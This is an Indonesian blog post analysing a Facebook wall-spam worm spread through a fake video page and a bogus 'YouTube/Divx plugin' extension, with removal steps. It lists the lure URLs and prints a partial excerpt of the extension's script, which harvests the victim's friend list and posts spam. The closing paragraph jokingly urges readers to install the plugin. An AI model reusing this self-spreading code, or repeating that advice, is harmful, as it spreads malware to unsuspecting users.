Tidak jauh beda dari posting sebelumnya, kali ini saya akan membahas tentang penyebaran link nakal melalui wall pada Facebook.
Hal ini bermula saat beberapa jam yang lalu salah satu teman saya mengirim sebuah link "video" yang menurut saya cukup menarik..
Bagaimana? menarik bukan? :D
Setelah saya "jalan-jalan" ternyata bukan cuma saya yang mendapat kiriman link tersebut. Beberapa teman saya juga terkena imbasnya, tapi tenyata teman-teman saya sudah pada canggih.
Canggih koq masih ada yang kena?!
Hmm.. saya rasa itu karena dia (korban) terlalu mengedepankan nalurinya sebagai lelaki. Haha :D coba lihat..
Jika sebagian dari anda sudah tahu akan hal ini dan sebisa mungkin mencoba menghindarinya. Saya justru "gatel", penasaran.. "bisa apa sih?". Untuk itu, langsung saja kita telusuri lebih dalam isi link tersebut.
Saya mulai dengan membuka link yang diberikan :
http://fbviralvideos.blogspot.com
Wow, sangat mirip dengan halaman video di facebook. Tapi saya rasa ini cuma cloning.
Fokus Pada Area Video
Di situ dijelaskan bahwa saya anda tidak dapat memutar video tersebut karena keterbatasan plugin Divx, dimana plugin tersebut merupakan premium plugin dari Youtube. Saya Anda diminta menginstalnya terlebih dahulu sebelum dapat menyaksikannya.
Setelah saya cari tahu, ternyata isi dari area tersebut diambil dari
http://pluginplugin.blogspot.com
yang disuntikan kedalam area video.
Sampai disini tidak akan terjadi apa2, kecuali anda meng-klik "Install Plugin". Apa yang akan terjadi?
Saat "Install Plugin" di-klik, browser akan bertanya apakah anda mengizinkan plugin tersebut "berkiprah" pada browser anda? Jika anda memberikan allow, maka plugin tersebut akan langsung ter-install setelah tombol "Install Now" anda tekan.
Sampai disini juga belum terjadi apa-apa.
Lho! Trus kapan?
Hoo.. sabar.. :)
Link nakal tersebut baru akan menyebar setelah anda me-restart browser anda.
Maaf, demi kenyamanan teman-teman facebook saya, pada contoh kasus ini saya login menggunakan account rahasia :p
Apa yang terjadi?
Dibawah ini hanya merupakan potongan script yang berkontribusi dalam penampilan link tersebut, sengaja tidak saya tampilkan semua karena akan menyalahi kode etik dunia persilatan :p
...
var randomnumber=Math.floor(Math.random()*10001) var video_url='http://fbviralvideos.blogspot.com/#'+ randomnumber +''; var domains=['http://i.imgur.com/piRgr.png']; var p0=['Check this','Its funny...','You will like..']; var p1=['hey','Hey','Ey!','Wazzup','Hello!','Look!','Great','Incredible!']; var p2=['this is really hot!','Look now!','hahaha!']; var p3=['HOT Girl Shows Her Breast on Live TV']; var message='';var a;gf=new XMLHttpRequest();gf['open']('GET','/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer='+uid+'&'+Math['random'](),false);gf['send']();if(gf['readyState']!=4){}else{data=eval('('+gf['responseText']['substr'](9)+')');if(data['error']){return false;}else{a=data;}} var b=a['payload']['entries']['length'];if(b>30){b=30};var cook=readCookie("fb_video_"+user_id);if(cook=="activo") return false;message=[randomValue(p1),randomValue(p2),randomValue(p3)]['join'](' ');var c=new XMLHttpRequest();var d='http://www.facebook.com/ajax/profile/composer.php?__a=1'; var title='HOT Girl Shows Her Breast on Live TV!!!'; var summary='HOT Girl Shows Her Breast on Live TV'; var imagen='http://i.imgur.com/piRgr.png';
...
Solusi
Apa bila anda sudah terkena (teman-teman saya bilang) "virus" itu, silahkan uninstall plugin Youtube extension yang ada pada browser anda. Pada Mozilla Firefox itu dapat dilakukan dengan masuk pada menu Tools >> Add-Ons lalu pada tab Extension cari Youtube extension lalu klik Uninstall dan restart browser anda.
Kesimpulan
Pada contoh kasus kali ini, silahkan anda klik link tersebut, silahkan anda install plugin yang direkomendasikan, tidak usah takut toh tidak akan terjadi apa-apa selama browser anda tidak di-restart :D